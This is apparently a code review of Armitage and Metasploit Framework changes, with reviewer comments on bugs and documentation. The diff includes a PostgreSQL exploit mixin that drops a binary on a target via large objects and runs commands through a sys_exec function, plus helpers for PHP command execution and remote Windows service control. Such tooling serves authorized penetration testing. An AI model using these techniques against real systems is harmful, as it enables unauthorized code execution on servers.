$hash = fixPass($hash);
[$queue addCommand: $null, "creds -a $host -p 445 -t smb_hash -u $user -P $hash"];
}
@ -106,6 +107,7 @@ sub createCredentialsTab {
$queue = [new armitage.ConsoleQueue: $client];
foreach $entry ($entries) {
($user, $pass, $host) = $entry;
$pass = fixPass($pass);
[$queue addCommand: $null, "creds -d $host -u $user -P $pass"];
}
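Review bot: In the delete loop only `$pass` is run through `fixPass`; `$user` goes into `"creds -d $host -u $user -P $pass"` as stored, without even the `\P{Graph}` strip that the add path applies a few lines earlier in this file. Give `$user` the same treatment in both places so an entry that could be added can also be deleted.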

View File

@ -114,7 +114,12 @@ sub loadPreferences {
sub loadDatabasePreferences {
if ($yaml_file eq "" || !-exists $yaml_file) {
$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
if (thisIsTheirCommercialStuff()) {
$yaml_file = getFileProper($BASE_DIRECTORY, "ui", "config", "database.yml");
}
else {
$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
}
}
if (!-exists $yaml_file) {
@ -340,6 +345,7 @@ sub createPreferencesTab {
sub setupBaseDirectory {
local('%o');
%o = call($client, "module.options", "post", "multi/gather/dns_bruteforce");
if ("NAMELIST" in %o && "default" in %o["NAMELIST"]) {
$BASE_DIRECTORY = getFileParent(getFileParent(getFileParent(getFileParent(%o["NAMELIST"]["default"]))));
$DATA_DIRECTORY = getFileParent(getFileParent(%o["NAMELIST"]["default"]));
@ -385,3 +391,8 @@ sub dataDirectory {
return $f;
}
sub thisIsTheirCommercialStuff {
# check if we're living in a Metasploit 4.5+ installer environment.
return iff("*app*pro*" iswm $BASE_DIRECTORY);
}
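Review bot: `thisIsTheirCommercialStuff` decides on the wildcard `"*app*pro*"` matched against `$BASE_DIRECTORY`, which is true for any install path that merely contains "app" followed somewhere by "pro", so an unrelated directory name can send `loadDatabasePreferences` to `ui/config/database.yml`. Test for the directory layout itself, the way the `startMetasploit` change in this commit does with `-exists getFileProper($msfdir, "apps", "pro", "msf3")`. `iff` is also called with the condition only; returning the `iswm` result directly would be clearer, and the function name should say what it detects.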

View File

@ -294,6 +294,11 @@ sub startMetasploit {
[System exit: 0];
}
# if the user chooses c:\metasploit AND we're in the 4.5 environment... adjust
if (-exists getFileProper($msfdir, "apps", "pro", "msf3")) {
$msfdir = getFileProper($msfdir, "apps", "pro");
}
if (charAt($msfdir, -1) ne "\\") {
$msfdir = "$msfdir $+ \\";
}
@ -472,6 +477,15 @@ sub _module_execute {
$host = "all";
}
# fix SMBPass and PASSWORD options if necessary...
if ("PASSWORD" in $3) {
$3['PASSWORD'] = fixPass($3['PASSWORD']);
}
if ("SMBPass" in $3) {
$3['SMBPass'] = fixPass($3['SMBPass']);
}
# okie then, let's create a console and execute all of this stuff...
local('$queue $key $value');
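Review bot: `$3['PASSWORD'] = fixPass($3['PASSWORD'])` and its `SMBPass` twin write the escaped value back into `$3`, the option hash handed in by the caller, so if that hash is reused for a second launch the password is escaped again. Escape into a local copy at the point where the option is sent to the console instead. Only these two option names are covered; add a short comment saying why no other credential option needs the same handling.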
@ -607,3 +621,8 @@ sub initConsolePool {
[$client addHook: "console.release", $pool];
[$client addHook: "console.release_and_destroy", $pool];
}
sub fixPass {
return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
}
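Review bot: `fixPass` has the same body as `_fix_pass` added to the Cortana credentials API in this commit; keep one definition and call it from both places so the two cannot drift apart. Add a comment stating which parser the escaping is meant to satisfy, since the `strrep` pass and the `\p{Punct}` pass both touch backslashes and the intended end result for a password containing one is not obvious from the code.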

View File

@ -428,13 +428,6 @@ public class Cortana implements Loadable, RuntimeWarningWatcher {
/* start the timer thread */
new cortana.support.Heartbeat(events).start();
/* regularly communicate with Metasploit or else our connection will drop */
new ArmitageTimer(client, "core.version", 200 * 1000L, new ArmitageTimerClient() {
public boolean result(String command, Object[] arguments, Map results) {
return true;
}
}, false);
}
started = true;
}
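Review bot: The deleted `ArmitageTimer` call on `core.version` sat under the comment "regularly communicate with Metasploit or else our connection will drop", and neither this hunk nor the changelog entry in this commit says what now keeps the connection alive. Record the reason for the removal, or point to the component that took over the keepalive, so a later idle-disconnect report can be traced back.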

View File

@ -25,6 +25,7 @@ public class ATable extends JTable {
specialitems.add("SigningCert");
specialitems.add("WORDLIST");
specialitems.add("SESSION");
specialitems.add("REXE");
return new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {

View File

@ -1,6 +1,24 @@
Armitage Changelog
==================
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option
- Added an icon to represent Windows 8
- [host] -> Login menu is now built using open services for all
highlighted hosts, not just the first one.
- [host] -> Login items now escape punctuation characters in passwords
before passing them to a framework module.
- Added the windows and linux postgres_payload exploits to the use a
reverse payload by default list.
- Small tweak to allow Armitage to work with Metasploit 4.5 installed
environment on Windows.
Cortana Updates (for scripters)
--------
- &credential_add and &credential_delete no longer break when a
password has creative punctuation in it.
26 Nov 12 (tested against msf 16114)
---------
- Windows command shell tab is now friendlier to commands that prompt
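Review bot: The entry "Added the windows and linux postgres_payload exploits to the use a reverse payload by default list" has a misplaced word and is hard to parse; something like "to the list of exploits that use a reverse payload by default" reads cleanly. The two `--------` underlines in the new section are also shorter than the `---------` used under the 26 Nov 12 heading.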

View File

@ -224,7 +224,7 @@ def nmap_validate_arg(str)
disallowed_characters = /([\x00-\x19\x21\x23-\x26\x28\x29\x3b\x3e\x60\x7b\x7c\x7d\x7e-\xff])/n
badchar = str[disallowed_characters]
if badchar
print_error "Malformed nmap arguments (contains '#{c}'): #{str}"
print_error "Malformed nmap arguments (contains '#{badchar}'): #{str}"
return false
end
# Check for commas outside of quoted arguments
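Review bot: With `c` corrected to `badchar`, the message now interpolates the offending byte raw, and since the class begins with `\x00-\x19` that byte can be a control character written straight to the console; print `#{badchar.inspect}` instead. While this line is open, check the upper bound of the first range: `\x00-\x19` followed by `\x21` leaves `\x1a` through `\x1f` accepted, so if the intent was every control character the bound should be `\x1f`.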

View File

@ -675,6 +675,13 @@ class DBManager
if sess_data[:desc]
sess_data[:desc] = sess_data[:desc][0,255]
end
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session.via_exploit == "exploit/multi/handler"
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.new(sess_data)
s.save!
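Review bot: `sess_data[:datastore]['ParentModule']` is used without a nil check, so a session from `exploit/multi/handler` whose datastore carries no `ParentModule` is saved with `:via_exploit` set to nil rather than the handler name. Fall back to `session.via_exploit` when the key is absent.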
@ -684,19 +691,26 @@ class DBManager
end
# If this is a live session, we know the host is vulnerable to something.
# If the exploit used was multi/handler, though, we don't know what
# it's vulnerable to, so it isn't really useful to save it.
if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler"
if opts[:session] and session.via_exploit
return unless host
mod = framework.modules.create(session.via_exploit)
if session.via_exploit == "exploit/multi/handler"
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
else
mod_name = mod.name
mod_fullname = mod.fullname
end
vuln_info = {
:host => host.address,
:name => mod.name,
:name => mod_name,
:refs => mod.references,
:workspace => wspace,
:exploited_at => Time.now.utc,
:info => "Exploited by #{mod.fullname} to create Session #{s.id}"
:info => "Exploited by #{mod_fullname} to create Session #{s.id}"
}
port = session.exploit_datastore["RPORT"]
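Review bot: `::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name` raises NoMethodError whenever the lookup returns nil, and it now runs for every handler session because the `!= "exploit/multi/handler"` guard was dropped from the `if`. Guard the lookup and skip the vuln report when no parent module can be resolved. `:refs => mod.references` still reads from `mod`, which is created from `session.via_exploit`, so for handler sessions the vuln is named after the parent module but carries the handler's references.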
@ -706,10 +720,15 @@ class DBManager
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler"
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit
end
attempt_info = {
:timestamp => Time.now.utc,
:workspace => wspace,
:module => session.via_exploit,
:module => via_exploit,
:username => session.username,
:refs => mod.references,
:session_id => s.id,

View File

@ -13,10 +13,13 @@ module Exploit::Remote::Postgres
require 'postgres_msf'
require 'base64'
include Msf::Db::PostgresPR
# @!attribute [rw] postgres_conn
# @return [::Msf::Db::PostgresPR::Connection]
attr_accessor :postgres_conn
#
# Creates an instance of a MSSQL exploit module.
# Creates an instance of a PostgreSQL exploit module.
#
def initialize(info = {})
super
@ -38,27 +41,66 @@ module Exploit::Remote::Postgres
register_autofilter_services(%W{ postgres })
end
# postgres_login takes a number of arguments (defaults to the datastore for
# appropriate values), and will either populate self.postgres_conn and return
# :connected, or will return :error, :error_databse, or :error_credentials
# Fun fact: if you get :error_database, it means your username and password
# was accepted (you just failed to guess a correct running database instance).
# Note that postgres_login will first trigger postgres_logout if the module
# is already connected.
def postgres_login(args={})
# @!group Datastore accessors
# Return the datastore value of the same name
# @return [String] IP address of the target
def rhost; datastore['RHOST']; end
# Return the datastore value of the same name
# @return [Fixnum] TCP port where the target service is running
def rport; datastore['RPORT']; end
# Return the datastore value of the same name
# @return [String] Username for authentication
def username; datastore['USERNAME']; end
# Return the datastore value of the same name
# @return [String] Password for authentication
def password; datastore['PASSWORD']; end
# Return the datastore value of the same name
# @return [String] Database to connect to when authenticating
def database; datastore['DATABASE']; end
# Return the datastore value of the same name
# @return [Boolean] Whether to print verbose output
def verbose; datastore['VERBOSE']; end
# @!endgroup
# Takes a number of arguments (defaults to the datastore for appropriate
# values), and will either populate {#postgres_conn} and return
# +:connected+, or will return +:error+, +:error_databse+, or
# +:error_credentials+ in case of an error.
#
# Fun fact: if you get +:error_database+, it means your username and
# password was accepted (you just failed to guess a correct running database
# instance).
#
# @note This method will first call {#postgres_logout} if the module is
# already connected.
#
# @param opts [Hash] Options for authenticating
# @option opts [String] :database The database
# @option opts [String] :username The username
# @option opts [String] :username The username
# @option opts [String] :server IP address or hostname of the target server
# @option opts [Fixnum] :port TCP port on :server
#
# @return [:error_database] if user/pass are correct but database is wrong
# @return [:error_credentials] if user/pass are wrong
# @return [:error] if some other error occurred
# @return [:connected] if everything went as planned
def postgres_login(opts={})
postgres_logout if self.postgres_conn
db = args[:database] || datastore['DATABASE']
username = args[:username] || datastore['USERNAME']
password = args[:password] || datastore['PASSWORD']
ip = args[:server] || datastore['RHOST']
port = args[:port] || datastore['RPORT']
db = opts[:database] || datastore['DATABASE']
username = opts[:username] || datastore['USERNAME']
password = opts[:password] || datastore['PASSWORD']
ip = opts[:server] || datastore['RHOST']
port = opts[:port] || datastore['RPORT']
uri = "tcp://#{ip}:#{port}"
if Rex::Socket.is_ipv6?(ip)
uri = "tcp://[#{ip}]:#{port}"
end
verbose = args[:verbose] || datastore['VERBOSE']
verbose = opts[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
rescue RuntimeError => e
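Review bot: The new YARD block lists `@option opts [String] :username` twice and never documents `:password` or `:verbose`, both of which the method reads from `opts`; the second `:username` line should be `:password`. `+:error_databse+` in the summary is misspelled and disagrees with the `@return [:error_database]` tag below it. The new `username`, `password` and `verbose` accessors are also shadowed by the locals of the same names assigned in the method body, so either use the accessors as the fallback values or pick different local names.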
@ -80,7 +122,9 @@ module Exploit::Remote::Postgres
end
end
# Logs out of a database instance.
# Logs out of a database instance and sets {#postgres_conn} to nil
#
# @return [void]
def postgres_logout
ip = datastore['RHOST']
port = datastore['RPORT']
@ -92,9 +136,13 @@ module Exploit::Remote::Postgres
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
end
# If not currently connected, postgres_query will attempt to connect. If an
# If not currently connected, attempt to connect. If an
# error is encountered while executing the query, it will return with
# :error ; otherwise, it will return with :complete.
#
# @param sql [String] The query to run
# @param doprint [Boolean] Whether the result should be printed
# @return [Hash]
def postgres_query(sql=nil,doprint=false)
ip = datastore['RHOST']
port = datastore['RPORT']
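Review bot: The description still says the method "will return with :error" or ":complete" while the new tag says `@return [Hash]`; state in the tag that these are keys of the returned hash and list the keys a caller can expect, including `:sql_error`, which other methods in this file read from the result.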
@ -104,7 +152,7 @@ module Exploit::Remote::Postgres
end
if self.postgres_conn
sql ||= datastore['SQL']
print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
begin
resp = self.postgres_conn.query(sql)
rescue RuntimeError => e
@ -151,15 +199,21 @@ module Exploit::Remote::Postgres
return :complete
end
# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
# inferring version number from the failed authentication messages.
# Attempts to fingerprint a remote PostgreSQL instance, inferring version
# number from the failed authentication messages or simply returning the
# result of "select version()" if authentication was successful.
#
# @return [Hash] A hash containing the version in one of the keys :preauth,
# :auth, or :unkown, depending on how it was determined
# @see #postgres_authed_fingerprint
# @see #analyze_auth_error
def postgres_fingerprint(args={})
return postgres_authed_fingerprint if self.postgres_conn
db = args[:database] || datastore['DATABASE']
username = args[:username] || datastore['USERNAME']
password = args[:password] || datastore['PASSWORD']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
uri = "tcp://#{rhost}:#{rport}"
if Rex::Socket.is_ipv6?(rhost)
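Review bot: The `@return` text names the key `:unkown`; check it against the key the method actually returns and fix whichever one is misspelled, since callers will copy it from the docs. `postgres_fingerprint` also keeps the parameter name `args` and has no `@option` tags, while `postgres_login` was renamed to `opts` and documented in this same commit, and the locals `rhost` and `rport` now shadow the accessors of the same names added above.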
@ -176,6 +230,10 @@ module Exploit::Remote::Postgres
return postgres_authed_fingerprint if self.postgres_conn
end
# Ask the server what its version is
#
# @return (see #postgres_fingerprint)
# @see #postgres_fingerprint
def postgres_authed_fingerprint
resp = postgres_query("select version()",false)
ver = resp[:complete].rows[0][0]
@ -185,6 +243,10 @@ module Exploit::Remote::Postgres
# Matches up filename, line number, and routine with a version.
# These all come from source builds of Postgres. TODO: check
# in on the binary distros, see if they're different.
#
# @param e [RuntimeError] The exception raised by Connection.new
# @return (see #postgres_fingerprint)
# @see #postgres_fingerprint
def analyze_auth_error(e)
fname,fline,froutine = e.to_s.split("\t")[3,3]
fingerprint = "#{fname}:#{fline}:#{froutine}"
@ -223,14 +285,26 @@ module Exploit::Remote::Postgres
when "Fauth.c:L273:Rauth_failed" ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)
when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
when "Fpostinit.c:L709:RInitPostgres" ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
# Windows
when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication' ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)
when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication' ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed' ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)
when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed' ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres' ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication' ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)
# OpenSolaris (thanks Alexander!)
when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
@ -243,6 +317,8 @@ module Exploit::Remote::Postgres
end
end
# @return [String] The password as provided by the user or a random one if
# none has been given.
def postgres_password
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
@ -252,7 +328,7 @@ module Exploit::Remote::Postgres
end
# This presumes the user has rights to both the file and to create a table.
# If not, postgre_query() will return an error (usually :sql_error),
# If not, {#postgres_query} will return an error (usually :sql_error),
# and it should be dealt with by the caller.
def postgres_read_textfile(filename)
# Check for temp table creation privs first.
@ -267,6 +343,8 @@ module Exploit::Remote::Postgres
return postgres_query(read_query,true)
end
# @return [Boolean] Whether the current user has privilege +priv+ on the
# current database
def postgres_has_database_privilege(priv)
sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
ret = postgres_query(sql,false)
@ -278,8 +356,9 @@ module Exploit::Remote::Postgres
end
# Creates the function sys_exec() in the pg_temp schema.
# @deprecated Just get a real shell instead
def postgres_create_sys_exec(dll)
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
resp = postgres_query(q);
if resp[:sql_error]
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
@ -290,6 +369,8 @@ module Exploit::Remote::Postgres
# This presumes the pg_temp.sys_exec() udf has been installed, almost
# certainly by postgres_create_sys_exec()
#
# @deprecated Just get a real shell instead
def postgres_sys_exec(cmd)
print_status "Attempting to Execute: #{cmd}"
q = "select pg_temp.sys_exec('#{cmd}')"
@ -302,88 +383,106 @@ module Exploit::Remote::Postgres
end
# Takes a local filename and uploads it into a table as a Base64 encoded string.
# Returns an array if successful, false if not.
# Uploads the given local file to the remote server
#
# @param fname [String] Name of a file on the local filesystem to be
# uploaded
# @param remote_fname (see #postgres_upload_binary_data)
# @return (see #postgres_upload_binary_data)
def postgres_upload_binary_file(fname, remote_fname=nil)
data = File.read(fname)
postgres_upload_binary_data(data, remote_fname)
end
# Writes data to disk on the target server.
#
# This is accomplished in 5 steps:
# 1. Create a new object with "select lo_create(-1)"
# 2. Delete any resulting rows in pg_largeobject table.
# On 8.x and older, postgres inserts rows as a result of the call to
# lo_create. Deleting them here approximates the state on 9.x where no
# such insert happens.
# 3. Break the data into LOBLOCKSIZE-byte chunks.
# 4. Insert each of the chunks as a row in pg_largeobject
# 5. Select lo_export to write the file to disk
#
# @param data [String] Raw binary to write to disk
# @param remote_fname [String] Name of the file on the remote server where
# the data will be stored. Default is "<random>.dll"
# @return [nil] if any part of this process failed
# @return [String] if everything went as planned, the name of the file we
# dropped. This is really only useful if +remote_fname+ is nil
def postgres_upload_binary_data(data, remote_fname=nil)
data = postgres_base64_data(data)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
# Writes b64 data from a table field, decoded, to disk.
#
# This is accomplished with 3 sql queries:
# 1. select lo_create
# 2. version dependant:
# - on 9.x, insert into pg_largeobject
# - on older versions, update pg_largeobject
# 3. select lo_export to write the file to disk
#
def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
oid = rand(60000) + 1000
remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
ver = postgres_fingerprint
case ver[:auth]
when /PostgreSQL 9\./
# 9.x does *not* insert the largeobject into the table when you do
# the lo_create, so we must insert it ourselves.
queries = [
"select lo_create(#{oid})",
"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
"select lo_export(#{oid}, '#{remote_fname}')"
]
else
# 8.x inserts the largeobject into the table when you do the
# lo_create, so we with a value.
#
# 7.x is an unknown, but this behavior was the default before the
# addition of support for 9.x above, so try it this way and hope
# for the best
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{remote_fname}')"
]
# From the Postgres documentation:
# SELECT lo_creat(-1); -- returns OID of new, empty large object
# Doing it this way instead of calling lo_create with a random number
# ensures that we don't accidentally hit the id of a real object.
resp = postgres_query "select lo_creat(-1)"
unless resp and resp[:complete] and resp[:complete].rows[0]
print_error "Failed to get a new loid"
return
end
oid = resp[:complete].rows[0][0].to_i
queries = [ "delete from pg_largeobject where loid=#{oid}" ]
# Break the data into smaller chunks that can fit in the size allowed in
# the pg_largeobject data column.
# From the postgres documentation:
# "The amount of data per page is defined to be LOBLKSIZE (which is
# currently BLCKSZ/4, or typically 2 kB)."
# Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
# stick to 2kB.
chunks = []
while ((c = data.slice!(0..2047)) && c.length > 0)
chunks.push c
end
chunks.each_with_index do |chunk, pageno|
b64_data = postgres_base64_data(chunk)
insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
queries.push( "#{insert}"%[oid, pageno, b64_data] )
end
queries.push "select lo_export(#{oid}, '#{remote_fname}')"
# Now run each of the queries we just built
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
# Can't really recover from this, bail
return nil
end
end
return oid,remote_fname
return remote_fname
end
# Base64's a file and returns the data.
# Calls {#postgres_base64_data} with the contents of file +fname+
#
# @param fname [String] Name of a file on the local system
# @return (see #postgres_base64_data)
def postgres_base64_file(fname)
data = File.open(fname, "rb") {|f| f.read f.stat.size}
postgres_base64_data(data)
end
# Converts data to base64 with no newlines
#
# @param data [String] Raw data to be base64'd
# @return [String] A base64 string suitable for passing to postgresql's
# decode(..., 'base64') function
def postgres_base64_data(data)
[data].pack("m*").gsub(/\r?\n/,"")
end
# Creates a temporary table to store base64'ed binary data in.
#
# @deprecated No longer necessary since we can insert base64 data directly
def postgres_create_stager_table
tbl = Rex::Text.rand_text_alpha(8).downcase
fld = Rex::Text.rand_text_alpha(8).downcase

View File

@ -31,6 +31,7 @@ module Exploit::Remote::SMTPDeliver
OptString.new('SUBJECT', [ true, 'Subject line of the email' ]),
OptString.new('USERNAME', [ false, 'SMTP Username for sending email', '' ]),
OptString.new('PASSWORD', [ false, 'SMTP Password for sending email', '' ]),
OptString.new('DOMAIN', [false, 'SMTP Domain to EHLO to', '']),
OptString.new('VERBOSE', [ false, 'Display verbose information' ]),
], Msf::Exploit::Remote::SMTPDeliver)
register_autofilter_ports([ 25, 465, 587, 2525, 25025, 25000])
@ -72,7 +73,11 @@ module Exploit::Remote::SMTPDeliver
print_verbose("Connecting to SMTP server #{rhost}:#{rport}...")
nsock = connect(global)
domain = Rex::Text.rand_text_alpha(rand(32)+1)
if datastore['DOMAIN'] and not datastore['DOMAIN'] == ''
domain = datastore['DOMAIN']
else
domain = Rex::Text.rand_text_alpha(rand(32)+1)
end
res = raw_send_recv("EHLO #{domain}\r\n", nsock)
if res =~ /STARTTLS/

View File

@ -17,9 +17,9 @@ class Framework
#
Major = 4
Minor = 5
Minor = 6
Point = 0
Release = "-release"
Release = "-dev"
if(Point)
Version = "#{Major}.#{Minor}.#{Point}#{Release}"

View File

@ -0,0 +1,58 @@
module Msf::Module::Deprecated
# Additional class methods for deprecated modules
module ClassMethods
# Mark this module as deprecated
#
# Any time this module is run it will print warnings to that effect.
#
# @param deprecation_date [Date,#to_s] The date on which this module will
# be removed
# @param replacement_module [String] The name of a module that users
# should be using instead of this deprecated one
# @return [void]
def deprecated(deprecation_date=nil, replacement_module=nil)
# Yes, class instance variables.
@replacement_module = replacement_module
@deprecation_date = deprecation_date
end
# The name of a module that users should be using instead of this
# deprecated one
#
# @return [String,nil]
# @see ClassMethods#deprecated
def replacement_module; @replacement_module; end
# The date on which this module will be removed
#
# @return [Date,nil]
# @see ClassMethods#deprecated
def deprecation_date; @deprecation_date; end
end
# (see ClassMethods#replacement_module)
def replacement_module; self.class.replacement_module; end
# (see ClassMethods#deprecation_date)
def deprecation_date; self.class.deprecation_date; end
# Extends with {ClassMethods}
def self.included(base)
base.extend(ClassMethods)
end
def setup
print_warning("*"*72)
print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*")
if deprecation_date
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
end
if replacement_module
print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
end
print_warning("*"*72)
super
end
end
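Review bot: `deprecated` stores its arguments in class instance variables, which Ruby does not share with subclasses, so a class that inherits from a deprecated module reports nil for both `replacement_module` and `deprecation_date`, and `setup` then prints only the generic banner. If that is intended, say so next to the "Yes, class instance variables" comment; otherwise have the two readers fall back to the superclass when their own variable is unset. `setup` and `self.included` also lack the YARD comments the rest of the file has.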

View File

@ -12,10 +12,10 @@ module Msf::Payload::Php
#
# The generated code will initialize
#
# @options options [String] :disabled_varname PHP variable name in which to
# @option options [String] :disabled_varname PHP variable name in which to
# store an array of disabled functions.
#
# @returns [String] A chunk of PHP code
# @return [String] A chunk of PHP code
#
def php_preamble(options = {})
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
@ -42,15 +42,15 @@ module Msf::Payload::Php
#
# Generate a chunk of PHP code that tries to run a command.
#
# @options options [String] :cmd_varname PHP variable name containing the
# @option options [String] :cmd_varname PHP variable name containing the
# command to run
# @options options [String] :disabled_varname PHP variable name containing
# @option options [String] :disabled_varname PHP variable name containing
# an array of disabled functions. See #php_preamble
# @options options [String] :output_varname PHP variable name in which to
# @option options [String] :output_varname PHP variable name in which to
# store the output of the command. Will contain 0 if no exec functions
# work.
#
# @returns [String] A chunk of PHP code that, with a little luck, will run a
# @return [String] A chunk of PHP code that, with a little luck, will run a
# command.
#
def php_system_block(options = {})

View File

@ -5,34 +5,108 @@ module Msf
class Post
module Windows
# @deprecated Use {Services} instead
module WindowsServices
def self.included(base)
include Services
end
def setup
print_error("The Windows::WindowsServices mixin is deprecated, use Windows::Services instead")
super
end
end
#
# Post module mixin for dealing with Windows services
#
module Services
include ::Msf::Post::Windows::Registry
#
# List all Windows Services present. Returns an Array containing the names
# of the services.
# Open the service manager with advapi32.dll!OpenSCManagerA on the
# given host or the local machine if :host option is nil. If called
# with a block, yields the manager and closes it when the block
# returns.
#
# @param opts [Hash]
# @option opts [String] :host (nil) The host on which to open the
# service manager. May be a hostname or IP address.
# @option opts [Fixnum] :access (0xF003F) Bitwise-or of the
# SC_MANAGER_* constants (see
# {http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx})
#
# @return [Fixnum] Opaque Windows handle SC_HANDLE as returned by
# OpenSCManagerA()
# @yield [manager] Gives the block a manager handle as returned by
# advapi32.dll!OpenSCManagerA. When the block returns, the handle
# will be closed with {#close_sc_manager}.
# @raise [RuntimeError] if OpenSCManagerA returns a NULL handle
#
def open_sc_manager(opts={})
host = opts[:host] || nil
access = opts[:access] || 0xF003F
machine_str = host ? "\\\\#{host}" : nil
# SC_HANDLE WINAPI OpenSCManager(
# _In_opt_ LPCTSTR lpMachineName,
# _In_opt_ LPCTSTR lpDatabaseName,
# _In_ DWORD dwDesiredAccess
# );
manag = session.railgun.advapi32.OpenSCManagerA(machine_str,nil,access)
if (manag["return"] == 0)
raise RuntimeError.new("Unable to open service manager, GetLastError: #{manag["GetLastError"]}")
end
if (block_given?)
begin
yield manag["return"]
ensure
close_sc_manager(manag["return"])
end
else
return manag["return"]
end
end
#
# Call advapi32.dll!CloseServiceHandle on the given handle
#
def close_sc_manager(handle)
if handle
session.railgun.advapi32.CloseServiceHandle(handle)
end
end
#
# List all Windows Services present
#
# @return [Array] The names of the services.
#
# @todo Rewrite to allow operating on a remote host
#
def service_list
serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
threadnum = 0
a =[]
services = []
registry_enumkeys(serviceskey).each do |s|
if threadnum < 10
a.push(::Thread.new(s) { |sk|
begin
srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s
if srvtype =~ /32|16/
services << sk
end
rescue
end
})
threadnum += 1
else
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
threadnum = 0
keys = registry_enumkeys(serviceskey)
keys.each do |s|
if a.length >= 10
a.first.join
a.delete_if {|x| not x.alive?}
end
t = framework.threads.spawn(self.refname+"-ServiceRegistryList",false,s) { |sk|
begin
srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s
if srvtype == "32" or srvtype == "16"
services << sk
end
rescue
end
}
a.push(t)
end
return services
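Review bot: In the `WindowsServices` shim, `include Services` inside `self.included(base)` runs with `self` set to `WindowsServices`, not `base`, so whether the including class ends up with the `Services` methods depends on Ruby propagating a late include through `WindowsServices`; use `base.send(:include, Services)` to make it explicit. In `service_list`, only the oldest thread is joined when ten are running, and nothing visible in this hunk joins the threads still in `a` before `return services`, so the array can be returned while workers are still appending to it. The bare `rescue` in the worker also hides every registry error; log it at least in verbose mode.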
@ -45,6 +119,13 @@ module WindowsServices
# command executed by the service. Service name is case sensitive. Hash
# keys are Name, Start, Command and Credentials.
#
# @param name [String] The target service's name (not to be confused
# with Display Name). Case sensitive.
